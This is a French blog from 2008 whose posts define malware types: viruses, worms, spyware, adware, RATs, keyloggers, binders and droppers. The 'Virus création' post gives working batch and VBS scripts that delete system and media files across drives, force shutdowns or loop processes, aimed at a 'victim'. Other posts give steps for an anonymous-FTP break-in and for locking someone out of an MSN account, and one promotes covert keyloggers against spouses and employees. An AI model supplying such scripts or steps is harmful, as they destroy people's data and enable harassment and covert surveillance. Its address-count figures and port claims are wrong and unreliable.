Certains virus sont programmés pour endommager ou supprimer les programmes ou les fichiers ou pour complètement effacer (reformatage) un disque dur. D'autres sont conçus pour simplement ennuyer l'utilisateur en affichant des textes ou des vidéo ou en diffusant des messages audio... Même ces simples virus "inoffensifs" peuvent créer des problèmes pour l'utilisateur : ils utilisent des ressources comme la mémoire au détriment des applications légitimes... En sus, beaucoup de virus sont écrits par des "script kiddies", assez mauvais en programmation, et sont truffés d'erreurs qui entraînent le blocage de l'ordinateur et la perte des données.

Nota :

Les vers (Worm)
Les vers ne se différencient des virus que par leur mode de propagation. Leur dispositif de propagation vise les systèmes de messagerie essentiellement afin de se propager de leur propre initiative par cette voie au lieu de viser les objets exécutables et d'attendre que ceux-ci soient répliqués par la volonté de l'utilisateur. Pour le reste, il s'agit de virus "normaux".

Les macrovirus
Les macrovirus ne se différencient des virus que par leur langage d'écriture (les langages "macro" des applications bureautiques). Ils infestent alors les documents de type bureautique Word, Excel etc. ... Leur propagation suit celle de la réplication des documents infestés. Si un document est dupliqué et distribué à un grand nombre d'utilisateurs, le virus est répliqué dans les mêmes proportions. Si le document n'est pas dupliqué, le virus n'ira pas plus loin. Un document Word pollué distribué à tous les collaborateurs d'une entreprise compromet la totalité des documents sur la totalité des ordinateurs de l'entreprise.

Script

2008-11-10T09:05:00.000-08:00

Script

Les scripts sont des programmes écrits dans un langage appelé "langage de script" tel que JavaScript. Indispensables mais trop puissants ou trop permissifs, ils permettent à quelques-uns toutes formes d'investigations ou de malveillances intrusives et / ou destructives.

Les scripts sont des programmes écrits dans un langage appelé "langage de script" tel que Javascipt

Nota :

Les langages de script sont des langages de très haut niveau - entendez par-là qu'ils se situent tout en haut des couches d'abstractions permettant d'accéder aux ressources des couches inférieures comme le système d'exploitation Windows et les ressources matérielles - à l'inverse par exemple du langage "assembleur" qui est le langage de plus bas niveau possible et qui lui s'adresse directement au matériel.

En gros :

il est (relativement) facile d'écrire quelque chose dans un langage de script mais avec des limitations (volontaires ou non y compris en vitesse d'exécution et étendue des possibilités) tandis qu'il est extrêmement difficile d'écrire en assembleur mais il n'y a aucunes limites de fonctionnalités et c'est le seul moyen d'optimiser totalement la vitesse d'exécution. L'intermédiaire étant des langages comme C++ qui donne un bon code mais optimisable.

le fonctionnement est en pelures d'oignons : le script de haut niveau fait des requêtes aux couches de l'operating system qui font des requêtes aux couches matériel qui font des requêtes au matériel et inversement, chaque couche étant constituée de deux strates, celle qui fait l'interface avec la couche de niveau supérieur - c'est la couche d'abstraction qui reçoit les requêtes et les met en forme - et celle qui fait l'interface avec les couches de niveau inférieur et passe les paramètres de la requête ou reçoit les résultats, c'est la couche physique. C'est grâce à ce genre de techniques en couches d'abstractions que le même script peut fonctionner en faisant des requêtes à Windows ou à Mac OS ou à Linux ou à Unix etc. ...

Phishing

2008-11-10T08:57:00.000-08:00

Phishing

La pêche à vos informations confidentielles (financières...)

Définition :

Le Phishing consiste, pour des escrocs, à aller à la pêche à vos informations confidentielles (financières, d'identification sur le système de votre entreprise etc. ...) en vous persuadant de les lui donner, tout simplement. Tout est dans la forme et vous allez tout leur donner, en vérifiant scrupuleusement que vous n'avez fait aucune faute de frappe, aucune erreur de mot de passe, de code confidentiel etc. ...

75% des titulaires de comptes sont concernés et cette escroquerie est en augmentation fulgurante

Des organisations travaillent sur ces problèmes au nveau du protiocole

Des alertes techniques sont lancées

Des informations et alertes grand public sont faites

Des sites sont consacrés à ce type d'escroquerie

L'attaque est lancée par spam (appelée quelquefois "spam frauduleux" ou "scam" ou "spoof email" ou "email hoax scam" ou encore "phishing scam") et met en oeuvre une copie miroir frauduleuse et piégée d'une page réelle d'un établissement financier. La propagation des scam de phishing utilise les 2 méthodes habituelles de propagation des spam.

Etymologie :

Le Phishing tient du huax (c'est de l' "intox") et de l'ingénierie sociale. Il est généralemnt basé sur l'attaque du plus grand nombre afin de lever rapidement, dans la masse des attaqués, un lot de gogos crédules et pas informés. Le phishing va consister à les mettre en confiance.

Vers

2008-11-10T08:50:00.000-08:00

Ces virus que l'on appelle Worms (Vers)

Les virus de type "worm" (vers) ont résolu l'un des problèmes des virus : celui de leur propagation. Les virus "traditionnels" sont statiques dans leur mode de propagation : ils attendent sagement qu'un être humain les balade d'une machine à une autre par hôte infecté. Les vers ont résolu ce problème en ajoutant un module d'auto-propagation à leur structure et ils s'envoient eux-mêmes, activement, vers d'autres machines en utilisant un système de transport.

Spyware

2008-11-10T08:29:00.000-08:00

Spyware

Définition

Est un " Spyware " tout code (1) introduit sur un dispositif pour collecter des informations à l'insu ou sans la permission explicite et éclairée de l'utilisateur et qui emploie tout moyen (2) pour délivrer ces informations (3).

(1) Code : Programme, sous-programme, composant, routine mais aussi micro-programme (bios, firmware etc. ...) et tout dispositif ayant ce comportement ou concourant à ce comportement.

(2) Moyen : Une connexion réseau mais aussi un support quelconque y compris la conservation de ces informations sur le dispositif de l'utilisateur permettant, au final, leur mise à disposition au profit d'un tiers.

(3) Informations : Peu importe que les informations soient des données personnelles ou non, soient nominatives ou non, et qu'il y ait ou non un rapprochement entre ces informations et l'identification de l'utilisateur, personne physique ou morale.

Etymologie

Spyware et un acronyme anglais venant de "Spy" (espion / espionne en anglais) et "ware" qui désigne une classe de logiciels (freeware, shareware, payware etc. ...). La traduction française en Logiciel Espion a donné Espiogiciel quelquefois mal orthographié en Espiongiciel.

Toolbar

2008-11-10T08:17:00.000-08:00

Toolbar

Barres d'outils (ToolsBar) :

Comment coller au plus près de vos mots-clés et des urls visitées pour vous espionner. Les barres d'outils surveillent les habitudes d'utilisation d'Internet. Elles utilisent aussi l'identifiant du produit Windows pour identifier l'ordinateur sur un serveur distant.

Description des barres d'outils (ToolBas) :

Une barre d'outils est un groupe de boîtes de dialogues, boutons et autres accessoires qui s'ajoutent à votre navigateur. Rarement utiles et toujours avec des arrières pensés, leurs installations sont faites sans notre consentement. Elles pullulent actuellement et sont toujours implantées lors de visites sur des sites piégés qui sont rémunérés au nombre de barres installées. Leur but est de toujours être au plus près de vos habitudes de navigation, de vos Mots-clés et de vos favoris. L'une des plus célèbres barres est celle de Google qui, si elle ne se sert pas de pièges mais d'appâts pour vous inciter à aller la chercher et l'installer (elle n'est pas agressive), agit tout de même en spyware de tracking et profiling :

Elle surf sur son anti-popup pour justifier son installation dans IE (Internet Explorer) sinon, comme les autres, elle serait inutile et personne n'en voudrait

Google à trouvé un second "truc" pour que les Webmasters en parlent : elle est le seul moyen de connaître le PageRank (le fameux "indice de popularité") des pages Web d'un site, et donc de ses propres pages lorsque l'on est soi-même Webmaster. Dieu sait s'il y a du nombrilisme dans l'air chez les Webmasters.

Quel est l'intérêt des barres d'outils pour l'internaute ? Strictement aucun ! Tous les outils qu'elles prétendent apporter existent déjà à de rares petits plus près sans lesquels on vit très bien. Alors, où est l'intérêt ? A qui profite le crime ? Eh bien, à ceux qui ont écrit ces barres d'outils. Une fois encore, rien n'est gratuit sur le Net. Elles servent à capter vos déplacements sur le Net pour vous diriger vers des sites "amis" avec lesquels l'éditeur de la barre à des accords dit d'"affiliation". Il faut drainer le plus de monde possible dans le moins de temps possible vers des sites marchands et toucher des commissions au passage et tout est bon pour piéger l'internaute. La technologie et l'agressivité des barres est dans une spirales ascendante vertigineuse. Les outils d'éradication étant de plus en plus puissants, les implantations de barres sont de plus en plus sauvages, agressives, rapides, furtives difficiles à éradiquer. Certaines nécessitent le développement d'outils spécifiques car les anti-trojans standards n'y arrivent plus. Elles se métamorphosent toutes les semaines etc. ... Elles naissent comme des champignons dans une chaude lumière après la pluie.

Adwares

2008-11-10T08:02:00.000-08:00

Adwares

Les gestionnaires de publicités

Les Adwares (publiciels) sont des tâches chargées de gérer et afficher des publicités sur nos ordinateurs et sur les sites que nous visitons. Elles sont intrusives et désagréables par destination et malveillantes par nécessité (se comportent en spywares).

Etymologie

Le mot Adware (Advertising software) vient d'une contraction de "Ads" (publicités en anglais) et "ware" qui désigne une classe de logiciels (freeware, shareware, payware etc. ...). Il existe des dizaines de classes inventées par des informaticiens ou des journalistes, dans la presse, les forums ou ailleurs :

"spywares " pour la classe des logiciels espions

"shareware" pour la classe des logiciels distribués librement pour essais et que vous payez volontairement si vous décidez d'en poursuivre l'usage au-delà d'une période raisonnablement convenue (généralement 15 à 30 jours)

"freeware" pour la classe des logiciels totalement gratuits

Et aussi certaines classes totalement farfelues ou très imagées comme :

"suppositware" : logiciels de m... (de crotte)

"tupperware" : logiciels dont le fonctionnement ou le mode d'emploi sont particulièrement hermétiques.

Définition

Il y a 2 définitions pour "adware"

Un adware est un programme qui dirige des publicités ciblées vers votre ordinateur, avec votre consentement initial pour cette tâche, ou sans votre consentement. L'adware est la partie installée sur les ordinateurs cibles d'un ensemble de moyens coopérant ensembles dont les autres parties sont les moyens logiciels d'une régie publicitaire et son réseau de serveurs appelés adservers.

Un adware est un "petit" utilitaire gratuit - un "freeware" ou "shareware" - supporté par un peu de publicité, c'est l'utilitaire lui-même qui est parfois appelé, par extension, un adware (une variante du freeware). C'est le cas, par exemple, de l'excellent 20/20, un programme de captures (copies) d'écrans gratuit. Son auteur en tire une rémunération par l'incrustation de bannières publicitaires gérées par un adware incorporé à 20/20. L'adware est donc alors un freeware dont le créateur conserve la propriété intellectuelle (copyright) et ne nous réclame pas de droit d'usage. En contrepartie, il perçoit une compensation monétaire en insérant un (ou des) bandeau(x) publicitaires dans son programme. Plusieurs de ces programmes n'ont pas besoin de fonctionner en ligne (c'est le cas de 20/20). Ils embarquent sur nos disques durs quelques bannières qui seront renouvelées lors de la prochaine mise à jour de logiciel. Toutefois lorsqu'il s'agit d'un "poids lourd" - un industriel du gratuit - avec toute une structure commerciale derrière - l'adware est bien la verrue (les composants logiciels), généralement parmi plusieurs, ajoutée à ce programme qui, lui, garde sa qualification de freeware. C'est le cas des Go!zilla, KazAa etc. ... A ce moment là, le freeware agit en trojan qui introduit, en nous le signalant parfois mais, le plus souvent à notre insu, des programmes de tierces parties dont les adwares.

Downloader

2008-11-10T07:48:00.000-08:00

Downloader (Téléchargeur)

Normalement, c'est un utilitaire dont le travail consiste à télécharger et, éventuellement, installer et enregistrer dans la base de registre, quelque chose. Implanté à votre insu, c'est un parasite qui va télécharger et installer d'autres parasites sur votre ordinateur, dans un système pyramidal.

En tant que parasite et comme son nom l'indique, ce n'est pas un Trojan mais une classe de parasites. Comme il s'agit de programmes à part entière, ils peuvent avoir, simultanément, d'autres activités affichées et apparentes ou masquées et inconnues.

Il existe plusieurs sortes de downloader. Contrairement aux Trojans (chevaux de Troie), au lieu d'embarquer la charge active avec eux, ils n'embarquent que les liens, généralement cryptés, stockés dans leur corps, des charges actives qu'ils ont le devoir de télécharger (downloader) et installer.

Ceci leur permet d'être plus petits et donc de "passer" plus facilement.

Ceci permet aussi de les modifier très facilement, tant au niveau des liens embarqués qu'au niveau de leurs propres signatures ce qui les rend plus furtifs.

Ceci permet enfin un mise à niveau aisée des parasites qu'ils ont la charges d'installer - ils peuvent, par exemple, être programmés pour aller régulièrement, à intervalles, chercher s'il existe une mise à jour du ou des parasites dont il a la charge.

Certains téléchargements, en apparences légitimes, se font par l'usage d'un downloader. Typiquement, une demande de téléchargement de KaZaA commence par le téléchargement d'un petit downloader qui prend en charge le téléchargement en lui-même. Il n'y a aucune raison valable à une telle pratique si ce n'est :

espionner le contenu de nos ordinateurs et le matériel installé

installer d'autres choses en plus du produit convoité

inhiber, durant le téléchargement et l'installation, nos outils de surveillance

assurer une installation "profonde" et / ou furtive que les installeurs classiques ne peuvent accomplir

installer un programme capable d'aller sur le Net pour télécharger du code inconnu sans nous en informer, sans que nous puissions nous y opposer et sans en connaître l'activité.

Connection aux Cam Réseaux

2008-11-09T14:57:00.000-08:00

Voici la nouvelle télé-réalité grandeur nature, et oui il est tout à fait possible de se connecter aux caméras de nos rues, écoles, halls, églises, cafés, rétaurants, usines, bref...La liste est longue mais peut-on et doit-on l'empêcher?

IP de vos contacts MSN

2008-11-09T14:09:00.000-08:00

Comment obtenir l'adresse IP d'un de vos contacts sur MSN. Tout est ici.Il existe une commande MS-DOS qui permet de recenser les adresses IP des ordinateurs ayant une connexion directe avec votre PC. Cette commande c'est netstat -n.

Pour exécuter cette commande, il faut se rendre dans le menu Démarrer puis Tous les programmes>Accessoires>Invite de commandes puis de taper netstat et enfin Entrer.

Mais le problème avec MSN c'est que toutes vos conversations textuelles passent par un serveur MSN auquel vous êtes connecté, si vous utilisez la commande netstat -n vous obtiendrez alors l'adresse IP du serveur MSN et non celle de votre correspondant. Attention, je vous conseille de fermer tous vos logiciels de type P2P avant l'utilisation de cette commande car sinon vous obtiendrez plusieurs dizaines d'adresses IP.

Pour obtenir l'adresse IP de votre correspondant, il faut simplement que vous ayez une connection directe avec lui comme un échange de fichiers en cours (téléchargement via MSN). Allez ensuite dans l'Invite de commandes, tapez netstat -n et vous obtiendrez l'adresse IP

Virus création et compréhension

2008-11-09T13:21:00.000-08:00

Je tiens à signaler que le texte ci-dessous et dans le seul but de vous informer sur le fonctionnement d'un virus

Tout d'abord nous allons créer quelques petits virus (bat et vbs) afin de mieux les comprendre

Ce n'est pas plus compliqué que ca
Ouvrez votre bloc-notes (notepad)
Tapez ceci dans le notepad:

%windir%\system32\shutdown.exe -s -t 60 -c "VIRUS"

Vous pouvez remplacer le "60" par n'importe quel nombre et "VIRUS" par n'importe quel motDès que vous l'avez écrit dans le notpad vous devez l'enregistre suivi de l'extension .vbsex:: monvirus.vbs

Un autre un peu plus méchant

Set variable = CreateObject("WScript.Shell")
Do
variable.run "notepad",false
Loop

la c'est pareil, enregistrez le avec l'extansion .vbs (toujours)On peut remplacer "notepad" par n'importe quelle action néfaste souhaitée.

FALSE:signifie que la victime ne verra pas ce qui s'affiche à l'écran.
LOOP: veut dire que l'action doit se faire en boucle.

Les Virus en .batch

Le batch est un language informatique qui sert à soumetre des actions (comme les fichiers .exe) au PC.

Voici un petit virus

@echo off
del C: windows*.exe

--> @ echo off : Signifie que la personne qui a reçu le virus ne verra pas ce qui est en train de se produire, il pourra toute fois entendre sont PC faire des bruits bizarres
--> DEL : (racourci de delete en anglais) il sert à suprimer
-->C: windows : Ceci situe l'endroit des choses à suprimer
-->* : Sert à designer tous les fichiers portant l'extansion qui la précède (dans l'example: exe)
--> .exe : C'est l'extansion à suprimer ( peut être remplacée par .mp3, .bmp, .wma, tout dépend des fichiers que la personne désire supprimer)

Bon, ensute on approfondit un peut

@echo off
del %systemdrive%*.mp3
del %systemdrive%*.avi
del %systemdrive%*.wma
cls

Ici, CLS sert a effacer l'ecran pour perturber la victime et rendre encore plus dangereux le virus.

@echo off
del C:/D:/E: *.mp3
del C:/D:/E: *.avi
del C:/D:/E: *.wma
cls

La, on a fait en sorte que le virus affecte les disques durs C, D, E, donc tout le PC (à moins que la victime ait des disques durs F, G, H, etc...)

Il est possible de remplacer C/D/E par %systemdrive%
Dans ce cas %systemdrive% remplace tous les disques durs présent dans le PC de la victime

Il est en suite possible de créer un virus déstructeur

@ echo off
del %systemdrive% *.exe
del %systemdrive% *.dat
del %systemdrive% *.GRF
del %systemdrive% *.cur
del %systemdrive% *.scr
del %systemdrive% *.ini
cls

Dans ce cas @ echo off rendra invisible le démarrage du virus, DEL lancera une action de suppression, %systemdrive% pour circuler dans tous les DD, * pour affecter l'ensemble des extensions qui la précède, .exe, .dat, .grf, .cur, .scr, .ini pour effacer les fichiers portant ce type d'extension et CLS éteindra l'écran de la victime.

Enfin, pour créer un virus, il faut impérativement que celui ci prenne le moins de place possible.

Et n'oubliez pas! Un PC coûte cher alors n'envoyez pas de virus...Merci

Intrusion par ftp

2008-11-03T13:52:00.000-08:00

Intrusion par ftp

Ici nous allons apprendre comment hacker un site par le ftp se qui est de plus en plus rare car les serveurs son protégés...Et "heureusement" pour nous.

Tout d'abord il faut aller dans le Menu démarrer ensuite clic sur exécuter puis tape ftp là une fenêtre MS-DOS s'ouvre et ça devrait ce présenter comme ça:

ftp>

Puis taper open puis l'adresse de ton site sans le http:// après taper : quote user ftp vous voyez ensuite une série de texte qui apparaît ensuite taper : quote cwd ~root vous voyez please login user and pass à ce moment vous taper : quote pass ftp si le serveur n'est pas protégé vous êtes dessus.

Voici les commandes :

Open: ouvre une session sur le site.
Mput: envoyer une liste de fichiers.
Mget: télécharger une liste de fichiers.
Put: Envoyer un fichier.
Get: prendre un fichier sur le site.
Delete: supprimer un fichier.
Rmdir: supprimer un répertoire.
Mkdir: crée un répertoire.
Cd: répertoire précédent.
Cd/: revenir a la racine.

Le Mail Bombarding

2008-11-03T13:45:00.000-08:00

Le Mail Bombarding

Le Mail Bombing consiste à envoyer un nombre faramineux d'emails (plusieurs milliers par exemple) à un ou des destinataires., dans le but de saturer le serveur de mails, la bande passante du serveur et du ou des destinataires, ou même de rendre impossible aux destinataires de continuer à utiliser l'adresse électronique !!

L'attaque

Il est nécessaire pour l'auteur de l'attaque de se procurer un logiciel permettant de réaliser le mail bombing, des logiciels qui permettent à l'utilisateur de choisir :

* l'adresse qu'il veut faire apparaître en tant qu'émetteur du message
* le sujet du message
* le nombre de messages à envoyer
* le serveur de mail à partir duquel les messages seront émis, (bien souvent si les administrateurs de serveurs mails ne se protègent pas assez, des serveurs "innocents" servent de relais sans le savoir, et le danger pour leurs propriétaires est de se retrouver "black listés" c'est à dire voir son fournisseur d'accès internet lui couper sa connexion)
* le corps du message
* l'adresse email de la victime

La possibilité d'y attacher une pièce jointe est une sérieuse menace, puisqu'elle permet à l'expéditeur d'insérer virus et troyens dans les messages. Une fois de plus, rappelons qu'il faut impérativement éviter d'ouvrir une pièce jointe ayant pour extension .com, .bat, .pif ou .exe...

Le Freezer

2008-11-03T13:29:00.000-08:00

Le Freezer

Une personne vous embête sur MSN? Vous voulez qu'il l'a boucle?

Alors il n'y a q'une seule solution: Le Freezer

Ce sont de petits programmes permetent de bloquer l'adresse MSN de la victime. Mais quand je dis "bloquer", je veut dire par là qu'il ne pourra plus se connecter sur MSN, ne pourra plus accéder à sa boite mail et ne pourra plus utiliser aucun service MSN ou Windows Live!

La procédure est simple:

Prenons comme exemple le Freezer "IceCold Reloaded". Dans la boite de texte "Hotmail ID", mettez l'adresse MSN de la cible, ensuite cliquez sur "Freeze Account" et lorsque le message "Account Frozen" s'affiche dans la barre nommée "Statut", alors c'est bon. Le compte sera bloqué !

"A ne pas mettre dans toutes les mains"

Le RAT

2008-11-03T13:17:00.000-08:00

RAT (Remote Administration Tool)

Définition :

Un RAT (Remote Administration Tool - Outil d'administration à distance) est un programme permettant la prise de contrôle totale, à distance, d'un ordinateur depuis un autre ordinateur. Il est constitué de deux parties : le "client" et le "serveur". Le "client" est installé sur l'ordinateur de celui qui prend le contrôle et le "serveur" est installé sur l'ordinateur contrôlé.

Description :

Grace à l'usage d'un RAT, une personne distante se retrouve dans une situation totalement identique à ce qu'elle serait si elle était devant la machine contrôlée. Son clavier devient le clavier de la machine distante, son écran devient l'écran de la machine distante, sa souris devient la souris de la machine distante etc. ... sans aucune limitation ni contrainte. Les seules limitations sont celles du profil du compte sous lequel est lancée la partie "serveur" :

Sous un compte "Administrateur", la personne distante à tous les droits les plus étendus sur la machine contrôlée

Sous un compte "Utilisateur Limité", la personne distante est limitée aux droits du compte limité sous lequel est lancé le serveur

La personne distante peut être à des centaines ou des milliers de kilomètres de la machine contrôlée. On conçoit donc que les RAT puissent constituer des agressions de la plus extrême gravité.

Autres noms (alias) :

Diverses erreurs d'usage et de transcription créent une grande confusion

Terme admis :

Remote Administration Tool est le seul terme exact. Ses déclinaisons et abréviations correctes sont:
Remote Administration Tools
Remote Admin Tool
Remote Admin Tools
RAT
RATs

Scanners de ports

2008-11-03T12:24:00.000-08:00

Scanners de ports

Les scanners de ports (et les scanners d'IPs) sont des outils logiciels automatiques (des robots) analysant les ports ouverts derrière une adresse IP (un ordinateur) afin d'y déceler une vulnérabilité exploitable. Les scanners de ports peuvent donc être utilisés par des administrateurs de réseaux pour surveiller et durcir les réseaux dont ils ont la charge grâce à des outils d'analyse comme les logiciels Nessus ou NMap. Ces mêmes outils scanners de ports se trouvent également entre les mains de pirates. Pour eux, la recherche de ports ouverts puis de ressources vulnérables derrière un port, est conduite afin d'exploiter la vulnérabilité, pénétrer la machine et en exploiter enfin les ressources.

En termes d'insécurité, les scanners de ports ne conduisent pas une attaque en eux-mêmes, ils la précèdent.

Fonctionnement d'un scanner de ports :

Dans son principe général, le fonctionnement est simple : un scanners de ports va scanner (tester, interroger) un intervalle de ports ou un dictionnaire de ports sur chaque machine dans un intervalle d'adresses IPs (scanner d'IPs). Par exemple : recherche de ports ouverts entre les ports 35000 et 35100 sur l'intervalle d'adresses IPs 128.208.78.000 à 128.208.78.255

65.536 ports par machines et 274.941.996.890.625 adresses IP possibles.
Les ports de communications des ordinateurs sont nombreux (Windows laisse ses 65.536 ports ouverts par défaut !)

Les adresses IPs (adresse de votre ordinateur sur le réseau) vont, dans la norme IPV4, de 000.000.000.000 à 255.255.255.255 soit 2554, c'est à dire 4.228.250.625 adresses et donc autant de machines possibles connectées - ceci sur la base d'un adressage dit "IPV4" qui fut mis en place à l'origine en pensant qu'avec plus de 4 milliards d'adresses on pourrait "tenir" l'adressage longtemps. L'adressage se fait maintenant sur une base dite "IPV6" soit 2556, c'est à dire 274.941.996.890.625 adresses possibles ce qui devrait nous laisser le temps de voir venir.

La ressource accessible recherchée est, le plus souvent, la partie "serveur" d'un RAT (Remote Administration Tool) - (appelé abusivement "Trojans") qui va permettre de prendre le controle d'un ordinateur à distance.

Dans la chronologie des faits :

La partie "serveur" d'un RAT (Remote Administration Tool) est lachée dans la nature, au même titre qu'un virus, pour qu'elle infecte le plus grand nombre d'ordinateurs possible. Toutes les méthodes sont "bonnes" pour le déployer :

Faux fichiers (fake) sur les réseaux de P2P

Fichiers infectés sur les réseaux de P2P

Typiquement, les générateurs de clé (keygen) pour débloquer des copies pirates de logiciels (ces "serveurs" sont scannés par des organismes de type "détectives privés" identifiant et poursuivant les utilisateurs de copies pirates)

Les "économiseurs d'écran" sont d'excellents vecteurs de Trojans et sont, quasiment tous, des backdoors

Fichiers piégés sur les sites de download

Procédures piégées que l'on doit télécharger pour, par exemple, pouvoir jouer en réseau (de très nombreux sites de jeux on-line sont, ainsi, des vecteurs de trojans)

Contrôles ActiveX agressifs

Scripts

Etc. ...

Un scanner est utilisé pour trouver des "serveurs" qui "répondent" sur les machines des victimes potentielles. Le scanner peut chercher plusieurs "serveurs" de plusieurs RAT pour augmenter ses chances de trouver quelque chose d'exploitable. L'attaquant dit au scanner quels sont les RAT qu'il utilise. On remarquera que l'attaquant peut "tomber" sur un "serveur" qui se trouve tout à fait légitimement chez la victime, lorsqu'il s'agit, par exemple, d'une entreprise dont le service informatique est situé, géographiquement, ailleurs, ou dont l'informatique est sous-traitée auprès d'un prestataire de service, et qui permet ainsi à ses informaticiens d'intervenir à distance. Il existe des dizaines de logiciels de télémaintenance / télédiagnostic commerciaux - le plus célèbre, que l'on trouve sur les rayons de tous les magasins, étant probablement "PC-Anywhere" de Norton / Symantec.

La partie "client" du RAT est utilisée, sur la machine de l'attaquant pour prendre le contrôle de la machine de la victime. Accessoirement, si l'attaquant ne tombe pas sur "son" trojan avec "son" mot de passe, il va chercher à forcer le serveur trouvé chez la victime potentielle pour établir le dialogue, à partir de listes de mots de passe (et les hackers s'échangent des listes de mots de passe), de dictionnaires de mots de passe, de "force brute" etc. ...

Une fois dans la place, le pirate fait ce qu'il veut, silencieusement. Regarder ce que fait la victime, copier ses fichiers, modifier ses fichiers parfois, cacher sur l'ordinateur de la victime des documents ou outils compromettants pour l'attaquant, utiliser ses ressources, sa bande passante etc. ... On observera qu'en principe le pirate ne se fait pas remarquer, ce n'est pas son intérêt du tout. Il n'y a donc pas de destruction de fichiers et autres attaques visibles comme "tuer les processus", "rebooter la machine" (mais certains pirates, les débutants, tombent, au début, dans ces travers et se font remettre rapidement en place par leurs ainés car, au début, il faut se rapprocher de groupes "d'entraide" entre pirates et demander des conseils aux "confirmés" et, en sus, si on se fait voir de la victime elle ne va pas mettre longtemps à réagir et éradiquer le "serveur" sur sa machine).

Le Keylogger

2008-11-03T11:39:00.000-08:00

Keyloggers

Programmes espions de surveillance, invisibles, notant la moindre activité sur un ordinateur dont toutes les frappes de touches au clavier.

Voudriez-vous savoir qui travaille sur votre PC et qu'est-ce qu'il y fait lorsque vous êtes absent ?

Voudriez-vous savoir ce que vos employés sont en train de faire au travail ?

Voudriez-vous savoir ce que fait vos enfants, avec qui ils parlent, l'objet de leur discussions sur internet?

Voudriez-vous savoir si votre époux (épouse) entretiend des liaisons secrètes sur Internet ?

Vous êtes un espion ou un détective privé ?

Si vous vous posez ces questions vous avez besoin d'un keylogger !

Keyloggers logiciel

Les Keyloggers sont des programmes, commerciaux ou non, d'espionnage. Ils peuvent être installés silencieusement et être actifs de manière totalement furtive sur votre poste de travail. Ils effectuent une surveillance invisible et totale, en arrière-plan, en notant dans des fichiers cachés et compressés le moindre détail de votre activité sur un ordinateur dont toutes les touches frappées au clavier, d'où leur nom de "key-logger". Ils sont aussi capables de faire un film de tout ce qui se passe à l'écran, en continu ou par capture d'écran à intervalles réguliers... Ils notent quels programmes sont utilisés et pendant combien de temps, les URL visitées, les e-mails lus ou envoyés, les conversations de toutes natures... dès la mise sous tension de la machine. Ils permettent, par la même occasion, de lire les champs habituellement cachés comme les mots de passe, les codes secrets etc. ... Enfin ils rendent compte, en temps réel ou en temps différé, sur place ou à distance. Il s'agit donc d'une agression particulièrement grave qui pose plusieurs problèmes :

La faille de sécurité qui à permis à quelqu'un de faire pénétrer cette malveillance.
Le keylogger en lui-même qu'il convient d'éradiquer.
Les mots de passe probablement révélés et autres données.
A qui le crime à profite ?

D'un autre côté, si mon employé tente d'accéder à des documents qu'il n'a pas à connaître ou s'il tente d'effectuer des opérations qu'il n'a pas à effectuer, si mon conjoint lit mon courrier perso, si mes enfants prétendent ne pas surfer sur tels ou tels sites alors que ma facture de téléphone prouve qu'un dialer m'assassine... Tout cela aussi constitue des agressions et je suis en devoir, si ce n'est en droit, de me protéger en enquêtant grâce aux keyloggers.

Le Binder

2008-11-03T11:13:00.000-08:00

Binder - Les lieurs de merdes

Binder

Programmes liants plusieurs programmes en un seul. En ce qui concerne l'insécurité informatique un binder sert à dissimuler dans un programme anodin et convoité un ou plusieurs parasites afin de leur faire pénétrer un système.

Deux types de Binders :

Programmes permettant d'accoler, de lier, un parasite à un programme que vous cherchez à télécharger. Vous recevez un tout qui est un exécutable constitué de 3 parties, le binder, le parasite et le programme convoité. Tous les types de parasites peuvent utiliser cette technique pour se diffuser, le programme convoité agissant alors en cheval de Troie (Trojan), volontairement ou involontairement (typique de la diffusion des adwares, spywares, Keyloggers, RATs et Backdoors). Le binder, qui va être exécuté lorsque vous cherchez à installer le programme convoité, est un lanceur délieur. Il va délier (libérer) le programme convoité et lancer son installeur et il va installer le (ou les) parasites. Ceci peut s'appliquer aussi à des fichiers images, des vidéos, des sons etc. ...

On remarquera qu'il y a une faille de sécurité (un manque de vigilance) car la taille du document (programme...) téléchargé n'est pas égale à la taille annoncée par son éditeur. Ceci aurait du être vérifié avant le téléchargement (par un système de clés...).

Un exemple :

Programmes assez proches des éditeurs de liens (linker - link edit) utilisés dans la phase de post compilation d'un programme pour lier et résoudre les liens des bibliothèques externes. Dans ce cas le Binder va regrouper en un seul programme plusieurs petits bouts d'une malveillance qui a été découpée pour pénétrer un système sans être identifiée ni même remarquée (utilisation faible de la bande passante etc. ...).

Il y a 3 problèmes :

Une faille de sécurité a permis le passage du binder et des morceaux de la malveillance
Le Binder
La Malveillance

Le Dropper

2008-11-03T10:35:00.000-08:00

Dropper

Parasite chargé d'introduire, décompresser et installer un autre parasite.

Forme minimaliste de Trojans juste chargée d'introduire, décompresser et installer une malveillance. Forme typique de l'installation d'un virus. Peut même s'autodétruire une fois sa tâche accomplie. Il existe une quantité incroyable de droppers, plusieurs milliers probablement, chacun étant une déclinaison de quelques matrices de droppers.

Le problème est triple :

Le fait que le dropper soit présent sur une machine signifie qu'elle a été pénétrée. Il y a donc une faille de sécurité à chercher.

Le dropper en lui-même qui est une malveillance à éradiquer

La ou les malveillances qu'il a pu installer. Il convient de scanner intégralement la machine ou le réseau

Méthodes de diffusion d'un parasite

2008-11-03T10:14:00.000-08:00

Méthodes de diffusion du parasite

Accès physique à l'ordinateur :

Le plus simple reste, tout de même, d'accéder physiquement à la machine (vous-même, votre copain, votre copine, un employé, un technicien de surface, un détective privé, un parent, un enfant, un ami, le service de gardiennage, la maintenance technique etc. ...) et d'y installer le parasite. Ce n'est probablement pas le cas pour les adwares mais ça l'est pour les Keyloggers, les Backdoors, les Remote Admin Tools etc. ... La personne qui accède à l'ordinateur peut même en être son utilisateur normal qui a été manipulé et installe tout à fait inconsciemment le parasite après avoir été convaincue qu'elle faisait tout à fait autre chose en installant cette disquette, ce CD, etc. ... Il faut considérer cela comme une faille de sécurité (la première faille de sécurité, la plus importante, se trouve souvent entre la chaise et le clavier).

Abus de faiblesse :

Un bon discours, un bon texte ou une démonstration trompeuse vous a convaincu qu'un truc était absolument indispensable et que vous ne pouviez pas vivre sans. C'est ainsi que bon nombre de parasites sont installés alors que vous croyez installez, vous-même, une simple barre d'outils (ToolsBar) dont vous êtes persuadé avoir besoin. De nombreux utilitaires de sécurités crapuleux, dont plusieurs embarquent, en sus, des parasites (agissent en Trojan) utilisent cette technique d'ingénierie sociale. Là aussi le problème est souvent entre la chaise et le clavier.

Usage d'un trojan :

